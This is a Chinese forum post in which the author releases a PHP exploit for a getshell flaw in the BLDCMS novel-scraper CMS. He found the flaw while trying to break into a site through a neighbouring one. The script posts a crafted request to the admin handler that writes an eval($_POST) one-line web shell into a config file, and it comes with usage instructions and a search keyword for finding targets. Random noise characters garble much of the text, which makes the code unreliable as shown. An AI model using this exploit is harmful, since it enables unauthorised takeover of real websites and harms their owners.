之前想搞一个黑阔站，发现旁站有一个站用了 BLDCMS，我就下载看了，找到了一个 getshell 漏洞。
/ h8 k1 {1 R5 q2 T" y
) q" ^8 k# k7 @! R0 ~ e 9 k( a2 k8 g6 C7 t/ P" H
话说昨晚晴天小铸在 90sec 发现有人把这个 getshell 漏洞的分析发出来了，擦，居然被人先发了。
8 h8 q9 L3 w! C' l' G ?
既然都有人发了，我就把我之前写好的 EXP 放出来吧。
" B3 \9 {% B9 c% h
view source print?01.php;">
0 d1 J g- s8 ]02.<!--?php
4 l' R* S, K" f# ^# C, }0 p03.echo "-------------------------------------------------------------------
. R7 d% e5 A& J# p8 B' Q3 I, S/ \2 \& T04. 6 o x4 m" U/ h6 j1 W# ~9 `5 g
05.------------\r\n BLDCMS(白老大php小说小偷) GETSHELL 0DAY EXP8 F8 N+ p, F! k, { I, x
06. 1 h' G r4 N4 s L( Q) @. i( A% e
07.(GPC=Off)\r\n Vulnerability discovery&Code by 数据流@wooyun3 _( S5 U5 |. ?
08. * @/ O* I5 e( t/ C: k
09.QQ:981009941\r\n 2013.3.21\r\n
4 b% ]5 I/ ~/ [5 L% P10.
4 Z9 ]" f. c8 x11. $ a7 I$ g/ t4 q) B+ z* e( U
12.用法:php.exe EXP.php www.baidu.com /cms/ pass(一句话密码5 ?4 A3 |; @ ~9 M0 u
13.
% C" y; p b* H% |# k& k6 o6 K# c14.)\r\n 搜索关键字:\"开发者: 白老大小说\"\r\n-----------
! C8 i2 a, [' x! `7 C15. . r" n, ]. R0 d0 _: ?; i
16.--------------------------------------------------------------------\r\n";; \$ C% E0 t9 G5 D5 b1 N2 u& F
17.$url=$argv[1];
' o; i# Q h Q% P18.$dir=$argv[2];4 u) O0 D9 Z# H' K7 |2 H! `7 j3 V
19.$pass=$argv[3];
* p {" P' S8 F8 E0 C" v20.$eval='\';eval($_POST['.'"'.$pass.'"'.']);\'';+ U/ d2 h9 ]( c3 p; g- N; [
21.if (emptyempty($pass)||emptyempty($url))2 k- @" K" [# O# r5 q8 K1 l3 E
22.{exit("请输入参数");}5 Y/ C, H0 q" ?, v" U H
23.else
1 e% L2 y. e, C. N% _24.{
, O4 D% N7 J: p9 a25.$fuckdata='sitename=a&qq=1&getcontent=acurl&tongji=a&cmsmd5=1&sqlite='.$ev8 E; Z8 `. R% k# {6 y3 X
26. 5 N- h+ g; _* C. T+ z
27.al;
- ~1 Q; V# B, h; i8 K28.$length = strlen($fuckdata);8 X7 C- _6 \) i' E7 ^" y9 J$ m
29.function getshell($url,$pass)7 E6 {/ S H ?5 {% A" L
30.{
* a( U$ E& P8 V) R, f \6 M31.global $url,$dir,$pass,$eval,$length,$fuckdata;4 {/ k$ x+ e G0 O
32.$header = " OST /admin/chuli.php?action=a_1 HTTP/1.1\r\n";
4 ]0 r3 j6 s1 r4 G* j33.$header .= "Content-Type: application/x-www-form-urlencoded\r\n";
: ?1 j& p/ O- i4 f+ @+ C34.$header .= "User-Agent: MSIE\r\n";
& P+ c) C2 I, ^6 i35.$header .= "Host:".$url."\r\n";' ~1 y! `7 s, ^8 ~6 O% P4 E5 t' M
36.$header .= "Content-Length: ".$length."\r\n";
3 r( @( c% q( {+ v& ]; @5 x7 j37.$header .= "Connection: Close\r\n";
; n8 j; n6 q3 `, L38.$header .="\r\n";
# c4 S; f; s) B) @8 \39.$header .= $fuckdata."\r\n\r\n";" X8 u2 @& U5 t2 J: L
40.$fp = fsockopen($url, 80,$errno,$errstr,15);
# J% h# `- V7 Z: T% B" q41.if (!$fp)- X5 O) T. c4 u9 w V) a1 h# F
42.{
: @( G: k! ?8 E43.exit ("利用失败:请检查指定目标是否能正常打开");1 k# q2 o* r/ |( @
44.}4 _- {8 w7 {6 N* d" w$ K
45.else{ if (!fputs($fp,$header))+ g) _0 j& r/ R8 u, v1 s( N8 e
46.{exit ("利用失败");}
, Q& }" u- J( u J! H! G% j47.else
& ?, y- C6 Y p7 \* v: T48.{
, |9 E1 @5 F8 R1 C/ R49.$receive = '';
Y! k1 l- r& l& ~50.while (!feof($fp)) {$ Q" _" q \+ v
51.$receive .= @fgets($fp, 1000);" ?/ d. |9 a) h
52.}$ l, r3 |, y. e+ v
53.@fclose($fp);
4 H* h; U& e3 e7 J" i+ n! ?54.echo "$url/$dir/conn/config/normal2.php pass pass(如连接失败 请检查目标6 k5 s! z$ u" |" S; a6 F
55. . m7 X; q/ a) `0 d9 n
56.GPC是否=off)";
+ t' k2 q$ ~5 Q# @57.}}
( R- h* p' l. G58.}
5 v9 U) o& r6 b& ?0 [- z: |- x59.}7 Q* ^7 ^6 v2 `* H4 [0 x* d" {
60.getshell($url,$pass); e6 s' v! g9 T' T, _7 H
61.?-->
* ]% `1 B: y# }8 o# c. s 8 k% S0 X( Q; y4 O+ s$ b
, u6 G* z9 F2 {- U6 l' [0 i3 m3 K6 r
by 数据流
|